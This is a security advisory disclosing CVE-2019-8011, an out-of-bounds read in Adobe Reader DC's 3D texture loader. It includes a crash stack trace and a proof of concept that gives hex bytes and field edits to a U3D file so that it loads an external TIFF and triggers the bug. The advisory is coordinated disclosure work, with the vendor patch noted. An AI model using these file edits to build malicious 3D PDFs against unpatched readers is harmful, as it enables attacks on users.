Advisories

Acrobat Reader DC 2d.x3d!_LoadTIFF() Out-of-Bounds Read

CVE ID

CVE-2019-8011

Tested Versions

  • Adobe Reader DC 2019.010.20099

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF). It provides compatibility to the ECMA-363 Standard (Universal 3D File Format) via 3difr.x3d, 2d.x3d and rt3d.dll, which allow viewing embedded 3D contents in PDF files. The ECMA-363 standard allows external texture images to be encoded with the Texture Resource Declaration Block, with options to load either JPEG/PNG images embedded in the PDF file, or other image types from the local file system. These external image formats include TGA, TIFF, PIC, GIF, BMP, PCX, PPM, IFF, FLI/FLC, RGB, PSD, RLE and CEL. The 2d.x3d module is activated when the users choose to enable 3D content display.

Vulnerabilities in this module do not affect a default installation, however, in certain industry sectors that have frequent exchange of 3D PDF files (e.g., CAD designs), 3D contents may be enabled as default, leaving users vulnerable to this attack vector.

Vulnerability

An out-of-bounds read can be observed in the context of the sandboxed process as the logged on user.

# The debugging and analysis were done on an Adobe Reader DC 2019.010.20099.
# The stack trace at crash site:

(106c.1598): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=000000ff ebx=00000100 ecx=000000fc edx=1da93000 esi=2b213000 edi=1d96f000
eip=5ce6b2a2 esp=0091acac ebp=0091acb8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
2d!png_set_filter_heuristics+0x7e2f:
5ce6b2a2 668b07          mov     ax,word ptr [edi]        ds:0023:1d96f000=????

0:000> kb 10
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0091acb8 5ce6a974 00000100 1d96eff8 2b212ff8 2d!png_set_filter_heuristics+0x7e2f
01 0091acf0 5ce6a605 20688d38 2b274fd0 5ce6b1e7 2d!png_set_filter_heuristics+0x7501
02 0091ad24 5ce62ab8 22e3cfa8 22dd4e68 30cb4fb0 2d!png_set_filter_heuristics+0x7192
03 0091ad38 57cd77f6 00000006 22e3cfa8 22dd4e68 2d!E3DLLFunc+0xbe5
04 0091ad58 57c9ae58 31da4f90 00000006 22e3cfa8 rt3d!FILETYPE::Func2d+0x5e
05 0091b1e0 57c993ee 35a425a8 0091b698 00000000 rt3d!PrepareRescale+0xac8
06 0091b218 57ccc859 35a425a8 0091b698 00000000 rt3d!GetPicture+0x2e
07 0091b454 57ccd566 35a425a8 0091b698 00000000 rt3d!EndPicturesCache+0x5352
08 0091b8c4 57ccca9b 35a424e8 35a425a8 0091bf0c rt3d!EndPicturesCache+0x605f
09 0091c118 57cccd56 35a424e8 00000000 30cb4fb0 rt3d!EndPicturesCache+0x5594
0a 0091c378 57c7fda5 16c67cb0 30cb4fb0 00000000 rt3d!EndPicturesCache+0x584f
0b 0091c398 57c077ea 00000002 30cb4fb0 b7db0154 rt3d!e3_SCENE::MovePDVToCameraNode+0xfcd
0c 0091c818 57bd3ebd 00000000 30cbcfc8 00000000 rt3d!V4CUnloadRT+0x30b97
0d 0091c830 591a06df 30cbcfc8 00000000 0091c884 rt3d+0x3ebd

Proof of Concept

To load external image with shading_M.u3d:

000002f0: 28 7c 3f 00 00 00 00 00 14 ff ff ff 3c 00 00 00  (|?.........<...
00000300: 00 00 00 00 05 00 6c 69 6e 65 73 02 00 00 00 00  ......lines.....
00000310: 00 00 00 00 01 00 00 00 55 ff ff ff 1c 00 00 00  ........U.......
00000320: 00 00 00 00 05 00 6c 69 6e 65 73 00 01 00 00 00  ......lines.....
00000330: 01 00 00 0e 01 00 00 00 01 0e 00 00 52 dc 00 00  ............R...

The following modifications need to be made to the above block:

# Modify the containing Modifier Chain Block (0xFFFFFF14) length:
; shading_M.u3d: change data size field to 0x54 from 0x3C

# Texture Resource Declaration Block (0xFFFFFF55):
; shading_M.u3d: change data size field to 0x34 from 0x1A

# 2d.x3d Image Loading construction from shading_M.u3d
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuationi Image Count
;                            // Now the Continuation Image Format record
; 01                         //    U8: Compression Type 0x01 JPEG-24
; 0e                         //    U8: Texture Image Channels
; 00 00                      //    U16: Continuation Image Attributes: default
; 52 dc 00 00                //    U32: Image Data Byte Count

# Modify to the following:
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height 
; 00 01 00 00                // U32: Texture Width 
; 0e                         // U8: Texture Image Type: 0x0E color RGB 
; 01 00 00 00                // U32: Continuationi Image Count 
;                            // Now the Continuation Image Format record:
; 02                         //    U8: Compression Type 0x02 PNG
; 0e                         //    U8: Texture Image Channels
; 01 00                      //    U16: Continuation Image Attributes: external
; 01 00 00 00                //    U32: Image URL Count 1
;                            //    0x16 bytes string "httpAAAAAAAsynAA12.tif"
; 16 00 68 74 74 70 41 41 41 41 41 41 41 73 79 6e 41 41 31 32 2e 74 69 66

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB19-41.

Timeline

  • 2019-05-07 Vendor disclosure
  • 2019-08-13 Vendor patched

Credit

Discovered by Wei Lei

Want to participate in such cutting-edge research?

We are hiring!

Find Out More